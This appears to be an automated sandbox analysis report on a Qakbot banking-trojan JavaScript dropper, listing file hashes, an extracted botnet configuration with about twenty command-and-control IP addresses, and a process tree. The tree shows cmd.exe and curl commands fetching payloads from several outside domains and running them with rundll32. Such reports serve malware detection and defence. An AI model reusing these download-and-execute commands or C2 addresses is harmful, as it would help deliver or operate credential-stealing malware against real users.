qakbot | 65efebe64ba9165d4c981c2d32d83f98848d84085cd6721e74c0954dbc553bf7

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
15/06/2023, 12:39

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

05929899.js
Size

464KB
MD5

7d5724b6bcbfd42b108e86eaf132062b
SHA1

add4aeb0182ac8dd2d9133275a42dd9df8a8b70c
SHA256

65efebe64ba9165d4c981c2d32d83f98848d84085cd6721e74c0954dbc553bf7
SHA512

f0ea4b12e7826d8e5d90acb2911883f8e6a88577d08a6c09b569f8740d1ba4a8e7128e83fa3a3d802642817aecac14fc4e40315fe811025f0b561a2ca97c5c01
SSDEEP

6144:LmFamddP19SiU+g9ITla9MGNs9yec26VZU6BboaI7CRY7kkh9:oLU3+gPZUW0d

Score

10^/10

qakbot obama268 1686733312 banker stealer trojan

Malware Config

Extracted

Family

qakbot

Version

404.1374

Botnet

obama268

Campaign

1686733312

125.99.76.102:443

80.12.88.148:2222

109.149.147.195:2222

27.99.32.26:2222

70.28.50.223:3389

70.28.50.223:32100

86.97.96.62:2222

66.241.183.99:443

74.12.146.45:2222

190.199.147.209:2222

47.205.25.170:443

12.172.173.82:993

12.172.173.82:22

84.35.26.14:995

72.134.124.16:443

85.240.173.251:2078

50.68.186.195:443

65.190.242.244:443

45.62.75.217:443

203.109.44.236:995

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	wscript.exe

Loads dropped DLL 1 IoCs

pid	Process
3988	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2256	timeout.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3988	rundll32.exe
3988	rundll32.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe
3300	wermgr.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 2704 wrote to memory of 4964	2704	wscript.exe	92
PID 2704 wrote to memory of 4964	2704	wscript.exe	92
PID 2704 wrote to memory of 3804	2704	wscript.exe	94
PID 2704 wrote to memory of 3804	2704	wscript.exe	94
PID 2704 wrote to memory of 2128	2704	wscript.exe	96
PID 2704 wrote to memory of 2128	2704	wscript.exe	96
PID 2704 wrote to memory of 5016	2704	wscript.exe	98
PID 2704 wrote to memory of 5016	2704	wscript.exe	98
PID 2704 wrote to memory of 4736	2704	wscript.exe	100
PID 2704 wrote to memory of 4736	2704	wscript.exe	100
PID 2704 wrote to memory of 980	2704	wscript.exe	102
PID 2704 wrote to memory of 980	2704	wscript.exe	102
PID 2704 wrote to memory of 1768	2704	wscript.exe	103
PID 2704 wrote to memory of 1768	2704	wscript.exe	103
PID 4964 wrote to memory of 4496	4964	cmd.exe	106
PID 4964 wrote to memory of 4496	4964	cmd.exe	106
PID 5016 wrote to memory of 3372	5016	cmd.exe	107
PID 5016 wrote to memory of 3372	5016	cmd.exe	107
PID 980 wrote to memory of 3396	980	cmd.exe	108
PID 980 wrote to memory of 3396	980	cmd.exe	108
PID 2128 wrote to memory of 1272	2128	cmd.exe	110
PID 2128 wrote to memory of 1272	2128	cmd.exe	110
PID 3804 wrote to memory of 2508	3804	cmd.exe	109
PID 3804 wrote to memory of 2508	3804	cmd.exe	109
PID 4736 wrote to memory of 4904	4736	cmd.exe	112
PID 4736 wrote to memory of 4904	4736	cmd.exe	112
PID 1768 wrote to memory of 2256	1768	cmd.exe	111
PID 1768 wrote to memory of 2256	1768	cmd.exe	111
PID 1768 wrote to memory of 2064	1768	cmd.exe	113
PID 1768 wrote to memory of 2064	1768	cmd.exe	113
PID 2064 wrote to memory of 3988	2064	rundll32.exe	114
PID 2064 wrote to memory of 3988	2064	rundll32.exe	114
PID 2064 wrote to memory of 3988	2064	rundll32.exe	114
PID 3988 wrote to memory of 3300	3988	rundll32.exe	115
PID 3988 wrote to memory of 3300	3988	rundll32.exe	115
PID 3988 wrote to memory of 3300	3988	rundll32.exe	115
PID 3988 wrote to memory of 3300	3988	rundll32.exe	115
PID 3988 wrote to memory of 3300	3988	rundll32.exe	115
PID 3988 wrote to memory of 3300	3988	rundll32.exe	115

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\05929899.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2704
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://rapiska.com/0.7813790639142011.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4964
- - C:\Windows\system32\curl.exe
    curl https://rapiska.com/0.7813790639142011.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
    3⤵
    PID:4496
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://tamimak.com/0.17287429721614433.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3804
- - C:\Windows\system32\curl.exe
    curl https://tamimak.com/0.17287429721614433.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
    3⤵
    PID:2508
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://corfinka.com/0.5034326869937886.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2128
- - C:\Windows\system32\curl.exe
    curl https://corfinka.com/0.5034326869937886.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
    3⤵
    PID:1272
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://qderika.com/0.14684990063874637.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5016
- - C:\Windows\system32\curl.exe
    curl https://qderika.com/0.14684990063874637.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
    3⤵
    PID:3372
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://bilaska.com/0.7719120186347061.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4736
- - C:\Windows\system32\curl.exe
    curl https://bilaska.com/0.7719120186347061.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
    3⤵
    PID:4904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://nirause.com/0.06605273887576801.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:980
- - C:\Windows\system32\curl.exe
    curl https://nirause.com/0.06605273887576801.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
    3⤵
    PID:3396
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX,must
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\system32\timeout.exe
    timeout 10
    3⤵
    - Delays execution with timeout.exe
    PID:2256
- - C:\Windows\system32\rundll32.exe
    rundll32 C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX,must
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2064
  - - C:\Windows\SysWOW64\rundll32.exe
      rundll32 C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX,must
      4⤵
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3988
    - - C:\Windows\SysWOW64\wermgr.exe
        
        C:\Windows\SysWOW64\wermgr.exe
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3300

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
12KB

MD5
2313a8e859366ccf938d9673a3e5d0bd

SHA1
94fa9d26dda046c753c89df51eec21e681b7e516

SHA256
cb2ab390ffd1a923008f95abaf34fd8c5ff186264e925ec32ef3616780b81060

SHA512
4400692bb7b6e2dd4b36ea1c8e37ec8ae9a9cfa6c2b541990afdb36a86b2bc30b8900a13c5a757781b7a79cdd6f6b5170ac7968746d9fb90fdaf10c245de9474

Download Submit
C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
28KB

MD5
630f9a72692810a09c496e4c474f0e67

SHA1
019149c1463b3391dccd87dfca61e59eb440b3ef

SHA256
a16847ad38b3fe738ac6bbaabeb0965e44f406bb9ded6455043e9a0d8eb97180

SHA512
9874a9ccac847107b9cff5c80b101940aedbb5f8ee0371c7245988bbbbca5f71d87a2e1c05b3873a4971319b9f961798085c08005ae08eb359eb4bae547f3786

Download Submit
C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
12KB

MD5
2313a8e859366ccf938d9673a3e5d0bd

SHA1
94fa9d26dda046c753c89df51eec21e681b7e516

SHA256
cb2ab390ffd1a923008f95abaf34fd8c5ff186264e925ec32ef3616780b81060

SHA512
4400692bb7b6e2dd4b36ea1c8e37ec8ae9a9cfa6c2b541990afdb36a86b2bc30b8900a13c5a757781b7a79cdd6f6b5170ac7968746d9fb90fdaf10c245de9474

Download Submit
C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
12KB

MD5
2313a8e859366ccf938d9673a3e5d0bd

SHA1
94fa9d26dda046c753c89df51eec21e681b7e516

SHA256
cb2ab390ffd1a923008f95abaf34fd8c5ff186264e925ec32ef3616780b81060

SHA512
4400692bb7b6e2dd4b36ea1c8e37ec8ae9a9cfa6c2b541990afdb36a86b2bc30b8900a13c5a757781b7a79cdd6f6b5170ac7968746d9fb90fdaf10c245de9474

Download Submit
C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
12KB

MD5
2313a8e859366ccf938d9673a3e5d0bd

SHA1
94fa9d26dda046c753c89df51eec21e681b7e516

SHA256
cb2ab390ffd1a923008f95abaf34fd8c5ff186264e925ec32ef3616780b81060

SHA512
4400692bb7b6e2dd4b36ea1c8e37ec8ae9a9cfa6c2b541990afdb36a86b2bc30b8900a13c5a757781b7a79cdd6f6b5170ac7968746d9fb90fdaf10c245de9474

Download Submit
C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
246KB

MD5
51f13c77e88b1654394d86ca23ea080b

SHA1
a4a48bba578c96cc7695377a190729de48eab5bf

SHA256
81e7fb4c88964d8b5a4200fdf1fb8c233b2903f2401cecd82696d163c0fd10ec

SHA512
c614a03dfa6db1a192f9e69b181623b80cf0d5a827ef80f82524ab5dbe25dd6d86dcf9b4dff5e4e7970ee3d8316afe58363841bcd4e12b3f9c0ce37f2536c79e

Download Submit
C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
246KB

MD5
bd24ab70fe7a82f22db22fe2b52db5d2

SHA1
443603dde22de48532ac2c26421d9f6bdb8dedc0

SHA256
4df4360ff47f3afcf8e78b05b4438b6edb8b00365e0b515e60bb905233e396e4

SHA512
a8307b7651b76dea7420038a9f38c4cb63bf16a9b3249181c8ee818d7ba0cbbd25daa1fbc25569967503edf3042c7f6ef63ca01992182501fd9a10cc42941255

Download Submit
C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
246KB

MD5
bd24ab70fe7a82f22db22fe2b52db5d2

SHA1
443603dde22de48532ac2c26421d9f6bdb8dedc0

SHA256
4df4360ff47f3afcf8e78b05b4438b6edb8b00365e0b515e60bb905233e396e4

SHA512
a8307b7651b76dea7420038a9f38c4cb63bf16a9b3249181c8ee818d7ba0cbbd25daa1fbc25569967503edf3042c7f6ef63ca01992182501fd9a10cc42941255

Download Submit
memory/3300-159-0x0000000000590000-0x00000000005B4000-memory.dmp

Filesize
144KB

Download
memory/3300-152-0x00000000005C0000-0x00000000005C2000-memory.dmp

Filesize
8KB

Download
memory/3300-153-0x0000000000590000-0x00000000005B4000-memory.dmp

Filesize
144KB

Download
memory/3300-161-0x0000000000590000-0x00000000005B4000-memory.dmp

Filesize
144KB

Download
memory/3300-162-0x0000000000590000-0x00000000005B4000-memory.dmp

Filesize
144KB

Download
memory/3300-163-0x0000000000590000-0x00000000005B4000-memory.dmp

Filesize
144KB

Download
memory/3300-164-0x0000000000590000-0x00000000005B4000-memory.dmp

Filesize
144KB

Download
memory/3988-147-0x0000000010000000-0x0000000010024000-memory.dmp

Filesize
144KB

Download
memory/3988-146-0x00000000007A0000-0x00000000007A3000-memory.dmp

Filesize
12KB

Download
memory/3988-160-0x00000000647C0000-0x0000000064802000-memory.dmp

Filesize
264KB

Download